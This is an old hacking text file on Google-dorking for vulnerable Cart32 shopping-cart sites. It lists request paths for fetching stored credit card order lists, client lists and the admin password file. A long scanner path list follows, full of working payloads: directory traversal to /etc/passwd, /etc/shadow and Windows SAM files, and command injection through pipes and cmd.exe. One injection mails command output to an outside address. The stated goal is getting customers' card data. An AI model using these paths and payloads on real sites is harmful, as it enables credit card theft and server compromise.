Twenty Year Anniversary

cart32.txt

cart32.txt
Posted Dec 14, 2003
Authored by fris | Site dreambigmedia.com

How to find Cart32 Sites with google.com.

tags | paper
MD5 | 6600df331c4d0133197e24c8d9ad5f46

cart32.txt

Change Mirror Download
Cart32
How to find Cart32 Sites by fris <chris@dreambigmedia.com>


goto www.google.com

and Search for something like: cart32.exe v3.5a or something along those lines..
now depending on what version you find is weather it is hackable or not..

most hackable are v2.5 these are very old however not alot of sites still use this
version 3.0 is hackable but it depends on which version
version 3.5a are more hackable than 3.0
version 4.0.. like i said theres no point even trying..

anyway once you found a site e.g.

www.domain.com/cgi-bin/cart32.exe/something-ItemList

now here are the exploits you could use to get the credit card list..

--

www.domain.com/cgi-bin/cart32.exe/something-order.txt

www.domain.com/cgi-bin/cart32.exe/something-output.txt

www.domain.com/cgi-bin/cart32.exe/something-ItemList

--

Getting The Admin Password

www.domain.com/cgi-bin/cart32.ini

You will need a cart32 Decoder to decode the admin password..

--

Getting The Client List

www.domain.com/cgi-bin/cart32.exe/cart32clientlist

--

Finding out the directory of cart32.exe or cweb32.exe

www.domain.com/cgi-bin/cart32.exe/error

Here is the vuln is cart32.exe servers.

scan of a server, obviouly cant mention the server.


/....../all
/....../config.sys
/....../etc/hosts
/../../../../all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htaccess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples/config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin/UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgiall
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin/glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin/mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin/postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin/search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin/textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/userfile.dat
/cgi-bin/view-source
/cgi-bin/visadmin.exe
/cgi-bin/w3-msql/
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois_raw.cgi
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/www-sql
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.pl
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-local
/cgi-shl/win-c-sample.exe
/cgi-src
/cgi-src/phf.c
/cgi-win
/cgi-win/uploader.exe
/cgibin
/com1
/com2
/com3
/com4
/con/con
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/default.asp.
/default.asp::$DATA
/doc
/iisadmpwd/aexp2.htr
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/iissamples/query.asp
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/sdk/asp/docs/codebrws.asp
/log
/logs
/mall_log_files/order.log
/manage/cgi/cgiproc
/msadc/Samples/SELECTOR/showcode.asp
/msadc/msadcs.dll
/msads/Samples/SELECTOR/showcode.asp
/ncl_items.html
/order/order.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/orders.txt
/pingall
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/pw/storemgr.pw
/quikstore.cfg
/samples/search/queryhit.htm
/scripts
/scripts/CGImail.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe/cart32clientlist
/scripts/cmd.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/dbman/db.cgi?db=invalid-db
/scripts/emurl/RECMAN.dll
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/issadmin/bdir.htr
/scripts/no-such-file.pl
/scripts/proxy/w3proxy.dll
/scripts/slxweb.dll
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/uploadn.asp
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wsisa.dll
/search97.vts
/server-status
/showfile.asp
/ssi/envout.bat
/ws_ftp.ini
/~
/~bin
/~guest
/~log
/~logs
/~lp
/~named
/~root
/~test
/~tmp
/test.php3
/cgi-bin/test.php3
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/ConsoleHelp/
/*.shtml/
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/..\..\..\winnt\repair\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/....../
/..../
/inc/
/include/
/iisadmpwd/
/iissamples/
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/global.asa
/global.asa+.htr
/global.asa\
/default.asp+.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_log/author.log
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/secret/index.html
/secret/index.htm
/cgi-bin/commander.pl
/cgi-bin/test.pl
/cgi-bin/test.cgi
/cgi-bin/webgais
/cgi-bin/perl
/perl
/scripts/perl.exe
/wwwboard/wwwboard.pl
/wwwboard/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/fi
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/scripts/wguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/scripts/test.bat
/cgi-bin/search.cgi%3fletter=
/cgi-bin/infogate
/search97/s97_cgi.exe
/search97/search97.vts
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-shl
/scripts/bdir.htr
/scripts/files.pl
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query="*"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/formto.pl
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/environ.pl
/cgi-bin/carbo.dll
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/snippets/setlocale.cfm
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
:8010/c://
:8010/d://
:8010//
:8010/..../
:8010/
:5000/
:2301
:3128/../../../../
:9090
:901
:8383
:800/../..\
:800/C:/
/scripts/repost.asp
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/foo.cmd?xxx&dir
/scripts/foo.cmd?xxx&dir
/cgi-dos/foo.cmd?xxx&dir
/cgi-bin/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/cgi-bin/tst2.bat
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/get16.exe
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/aliredir.exe
:8080/../../../conf/Eserv.ini
:3128/../../../conf/Eserv.ini
:801/../../../../../../../../etc/hosts
:8888/
:9998/
/publisher/
/bigconf.cgi
/cgi-bin/bigconf.cgi
/scripts/bigconf.cgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/OrderForm.cgi
/cgi-bin/flexform.cgi
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/perlidlc.bat?&dir
/ows-bin/*.bat?&dir
:8003/Display
/cgi-bin/whois.cgi
/minivend/catalog.cfg
/cgi-bin/simple
/cgi-bin/simple/config/menu
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/search%3f
/suche%3f
/search/iaquery.exe%3f
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/w3-msql/index.html
/msadc/samples/adctest.asp
/scripts/tools/getdrvrs.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/cgi-bin/forum.pl
/cgi-bin/forum-admin.pl
/cgi-bin/sendmail.cgi
/cgi-bin/guestadd.pl
/manage/cgi/cgiproc?Nocfile=
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/wwwthreads/changedisplay.pl
/scripts/wsisa.dll/WService=anything?WSMadmin
/cgi-bin/Ultimate.cgi
/cgi-bin/forumdisplay.cgi
/ubb/cgi-bin/postings.cgi
/cgi-bin/postings.cgi
/cgi-bin/core
/cgi-bin/echo.bat
/cgi-bin/hello.bat
/cgi-bin/htsearch?exclude=%60%60
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/rmp_query
/cgi-bin/.fhp
/cgi-bin/uploadn.asp
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/abuse.man?file=&domain=&script=
/jsp/source.jsp
/cgi-bin/dfire.cgi
/cd/../config/html/cnf_gi.htm
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/ccbill/
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/dcforum/install_help.cgi
/doc/
/scripts/slxweb.dll/admin
/cgi-bin/getdoc.cgi
/cgi-bin/webplus?script=
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/_vti_aut/mtd2lv.dll
/piranha/secure/passwd.php3?username=piranha&passwd=q
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/cgi-bin/cart32.exe/expdate
/scripts/dbman/db.cgi?db=tedb
/scripts/process_bug.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/scripts/emurl/RECMAN.dll?
/cgi-bin/allmanage.cgi
/cgi-bin/ads.cgi
/ads/admin.cgi
/ads/adpassword.txt
/scripts/Carello/add.exe
:8000/cgi/wja?page=wja
/robots.txt
/file/index.jsp
/file/main.jsp
/file/main.shtml
/file/index.shtml
/file/main.jhtml
/file/index.jhtml
/cgi-bin/showfile
/servlet/SessionServlet
/servlet/viewsource.jsp
/viewsource.jsp
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/site/eg/source.asp
/eg/source.asp
/cgi-bin/source.asp
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/msn.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/upload.cgi
/.www.my.cnf
/cgi-bin/.www.my.cnf
/cgi-bin/futureforum.cgi
/examples/applications/bboard/bboard_frames.html
/admin-serv/config/admpw
/https-admserv/config/admpw
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/active.log
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/ssi//../../../../../../../../../etc/hosts
:8080/examples/jsp/snp/anything.snp
:8080/anything.jsp
/anything.jsp
/examples/jsp/snp/anything.snp
/pservlet.html
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto
/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.com&filename=mailfile.cgi
/cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/af.cgi
/%00/
/admin/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/servlet/file
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/servlet/test/pathInfo/test
/~nobody/etc/
:3000/../../hosts
:444/..\..\..\..\..\autoexec.bat
/pccsmysqladm/incs/dbconnect.inc
/include/dbconfig.inc
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/netauth.cgi?cmd=show&page=../../
/admin.php3?admin=whatever
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/CGImail.exe
/.photon/voyager/config.full
/cgi-bin/cpmdaemon.cgi
:8088
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/cgi-bin-sdb/
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/search.dll?search?query=%00&logic=AND
m/search.dll?search?query=/&logic=AND
:8002/Newuser?Image=../../database/rbsserv.mdb
/doc/packages/
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/_private/shopping_cart.mdb
/cgi-bin/webdata_test.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/c/s.dll/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/index.php3?vhosts=http://go.to
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/+/
/./
/+./
/++/
/++./
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00
/."./."./Perl/eg/core/findtar
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/."./."./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php
../..
../../boot.ini
/......../
/....../autoexec.bat
/../../config.sys
/.html/............../config.sys
/?PageServices
/_AuthChangeUrl?
/_private/form_results.htm
/_private/orders.htm
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_vti_bin/
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.exe
/_vti_pvt/access.cnf
/_vti_pvt/admin.pwd
/_vti_pvt/service.cnf
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/admcgi/contents.htm
/admin.php3
/adminlogin?RCpage=/sysadmin/index.stm
/admisapi/fpadmin.htm
/Album/
/aux
/bb-dnbd/bb-hist.sh
/cfappman/index.cfm
/cfdocs/exampleapp/publish/admin/application.cfm1/cfdocs/exampleapp/email/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expressions.cfm
/cfdocs/root.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi-bin/
/cgi-bin/AnForm2
/cgi-bin/apexec.pl
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/axs.cgi
/cgi-bin/bb-hist.sh
/cgi-bin/c_download.cgi
/cgi-bin/calendar
/cgi-bin/cgiback.cgi
/cgi-bin/cgi-lib.pl
/cgi-bin/classified.cgi
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/displayTC.pl
/cgi-bin/download.cgi
/cgi-bin/enter.cgi
/cgi-bin/ews
/cgi-bin/filemail.cgi
/cgi-bin/finger?@localhost
/cgi-bin/form.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW/GWWEB.EXE
/cgi-bin/handler.cgi
/cgi-bin/htgrep
/cgi-bin/htmldocs
/cgi-bin/icat
/cgi-bin/login.cgi
/cgi-bin/logs
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/MachineInfo
/cgi-bin/maillist.cgi
/cgi-bin/message.cgi
/cgi-bin/meta.pl
/cgi-bin/minimal.exe
/cgi-bin/mlog.phtml
/cgi-bin/nlog-smb.cgi
/cgi-bin/nph-error.pl
/cgi-bin/ntitar.pl
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/phf.cgi
/cgi-bin/phf.pp
/cgi-bin/php
/cgi-bin/post_query
/cgi-bin/redir.exe
/cgi-bin/redirect
/cgi-bin/responder.cgi
/cgi-bin/sawmill
/cgi-bin/search/search.cgi
/cgi-bin/search/tidfinder.cgi
/cgi-bin/sendform.cgi
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/sojourn.cgi
/cgi-bin/spin_client.cgi
/cgi-bin/stats.prg
/cgi-bin/statsconfig
/cgi-bin/tablebuild.pl
/cgi-bin/testcgi.exe
/cgi-bin/test-cgi.tcl
/cgi-bin/tigvote.cgi
/cgi-bin/upload.pl
/cgi-bin/visitor.exe
/cgi-bin/w2-msql
/cgi-bin/w3-msql
/cgi-bin/w3tvars.pm
/cgi-bin/webmap.cgi
/cgi-bin/Web_store/web_store.cgi
/cgi-bin/webutils.pl
/cgi-bin/wrap.cgi
/cgi-bin/wwwboard.cgi
/cgi-bin/YaBB.pl
/cgi-win/wwwuploader.exe
/code.php3
/con
/config/check.txt
/database.nsf/
/DataBase/
/default.asp
/domcfg.nsf
/domcfg.nsf/?open
/eatme.ida
/eatme.idc
/eatme.idq
/eatme.idw
/eatme.pl
/getdrvrs.exe
/GetFile.cfm
/html/?PageServices
/iisadmin
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/index.asp::$DATA
/lpt
/main.asp%81
/neowebscript/test/senvironment.nhtml
/neowebscript/tests/load_webenv.nhtml
/neowebscript/tests/mailtest.nhtml
/officescan/cgi/jdkRqNotify.exe
/perl/files.pl
/phpPhotoAlbum/getalbum.php
/products/phpPhotoAlbum/explorer.php
/reviews/newpro.cgi
/samples/isapi/srch.htm
/samples/search/webhits.exe
/sawmill
/scripts/
/scripts/../../cmd.exe?%2FC+echo+\'hacked!\'>c:\\hello.bat
/scripts/c32web.exe
/scripts/cart32.exe
/scripts/cpshost.dll
/scripts/Fpadmcgi.exe
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
